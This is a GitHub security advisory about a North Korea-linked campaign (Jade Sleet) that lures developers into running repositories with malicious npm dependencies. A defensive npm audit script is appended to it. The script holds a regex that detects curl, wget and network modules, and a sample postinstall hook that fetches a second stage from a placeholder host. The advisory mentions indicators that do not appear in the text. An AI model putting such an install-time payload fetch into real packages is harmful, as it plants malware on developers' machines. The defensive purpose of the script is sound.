GitHub has identified a low-volume social engineering campaign that targets the personal accounts of employees of technology firms, using a combination of repository invitations and malicious npm package dependencies. Many of these targeted accounts are connected to the blockchain, cryptocurrency, or online gambling sectors. A few targets were also associated with the cybersecurity sector. No GitHub or npm systems were compromised in this campaign. We’re publishing this blog post as a warning for our customers to prevent exploitation by this threat actor.
We assess with high confidence that this campaign is associated with a group operating in support of North Korean objectives, known as Jade Sleet by Microsoft Threat Intelligence and TraderTraitor by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Jade Sleet mostly targets users associated with cryptocurrency and other blockchain-related organizations, but also targets vendors used by those firms.
The attack chain operates as follows:
- Jade Sleet impersonates a developer or recruiter using one or more persona accounts on GitHub and other social media providers. Thus far, we have identified personas operating on LinkedIn, Slack, and Telegram. In some cases these accounts are newly created fakes; in other cases, they are legitimate accounts that Jade Sleet has taken over. The actor may initiate contact on one platform and then attempt to move the conversation to another platform.
- After establishing contact with a target, the threat actor invites the target to collaborate on a GitHub repository and convinces the target to clone and execute its contents. The GitHub repository may be public or private. The GitHub repository contains software that includes malicious npm dependencies. Some software themes used by the threat actor include media players and cryptocurrency trading tools.
- The malicious npm packages act as first-stage malware that downloads and executes second-stage malware on the victim’s machine. Domains used for the second-stage download are listed below.
The threat actor often publishes their malicious packages only when they extend a fraudulent repository invitation, minimizing the exposure of the new malicious package to scrutiny.
In some cases, the actor may deliver the malicious software directly on a messaging or file sharing platform, bypassing the repository invitation/clone step.
The mechanics of the first-stage malware are described in detail in a blog post by Phylum Security.
Phylum’s work, conducted completely independently of GitHub, mirrors our own research.
- We have suspended npm and GitHub accounts associated with the campaign.
- We are publishing indicators below.
- We have filed abuse reports with domain hosts in cases where the domain was still available at time of detection.
- If you were solicited, by anyone, to clone or download content associated with one of the accounts noted below, then you were targeted by this campaign.
- You can review your security log for `action:repo.add_member` events to determine whether you ever accepted an invite to a repository from one of the accounts noted below.
- Be wary of social media solicitations to collaborate on or install npm packages or software that depends on them, particularly if you are associated with one of the targeted industry sectors listed above.
- Examine dependencies and installation scripts. Very recently published or net-new packages, and any scripts or dependencies that make network connections during installation, should receive extra scrutiny.
- If you were targeted by the campaign, we recommend you contact your employer’s cybersecurity department.
- If you executed any content as a result of this campaign, it may be prudent to reset or wipe potentially affected devices, change account passwords, and rotate sensitive credentials/tokens stored on the potentially affected device.
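The dependency checks recommended above (install-time scripts, network activity during installation, very recently published packages) can be turned into a small audit. This is an added example, not code from GitHub or from the post; the package manifests, bundled file contents and registry `time.created` timestamps it inspects are constructed, and the 30-day "new package" threshold is our own choice.

```javascript
// Added example, not code from the GitHub post: audit npm dependency manifests
// for the signals the post calls out: install-time lifecycle scripts, network
// activity during installation, and packages first published only days ago.
// The manifests, file contents and registry "time.created" values below are
// constructed for this demo.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Crude but useful: shell downloaders, URLs, and Node's network modules.
const NETWORK_RE = /\b(?:curl|wget)\b|https?:\/\/|\bfetch\s*\(|require\(['"](?:https?|net|dns|dgram)['"]\)/;
const NEW_PACKAGE_DAYS = 30; // our threshold for "very recently published"
// manifest: parsed package.json; files: { filename: contents } for scripts the
// hooks invoke; created: the registry document's time.created (ISO timestamp).
function auditPackage({ manifest, files = {}, created }, now = Date.now()) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    findings.push(`lifecycle script "${hook}": ${cmd}`);
    // Scan the command itself plus any bundled file it references.
    const referenced = Object.keys(files).filter((f) => cmd.includes(f));
    const toScan = [cmd, ...referenced.map((f) => files[f])];
    if (toScan.some((src) => NETWORK_RE.test(src))) {
      findings.push(`network activity reachable from "${hook}"`);
    }
  }
  const ageDays = (now - Date.parse(created)) / 86400000;
  if (ageDays < NEW_PACKAGE_DAYS) findings.push(`first published ${ageDays.toFixed(1)} days ago`);
  return { name: manifest.name, version: manifest.version, findings, suspicious: findings.length > 0 };
}
// Constructed samples: one shaped like the post's description, one benign and long-lived.
const FIXED_NOW = Date.parse('2023-07-18T00:00:00Z'); // fixed clock for reproducible output
const SAMPLES = [
  {
    manifest: { name: 'example-media-helper', version: '1.0.1', scripts: { postinstall: 'node setup.js' } },
    files: { 'setup.js': "require('https').get('https://placeholder.example/next-stage.js', () => {});" },
    created: '2023-07-15T09:12:00Z',
  },
  {
    manifest: { name: 'example-string-utils', version: '4.2.0', scripts: { test: 'mocha' } },
    files: {},
    created: '2016-03-23T00:00:00Z',
  },
];
function auditSamples() {
  return SAMPLES.map((s) => auditPackage(s, FIXED_NOW));
}
auditSamples().forEach((r) => console.log(`${r.name}@${r.version}: ${r.suspicious ? 'REVIEW' : 'ok'}`, r.findings));
```

On a real checkout, feed `auditPackage` each `node_modules/*/package.json` together with the files its hooks reference and the `time.created` field from `https://registry.npmjs.org/<name>`; anything flagged deserves a manual read before `npm install` is allowed to run scripts.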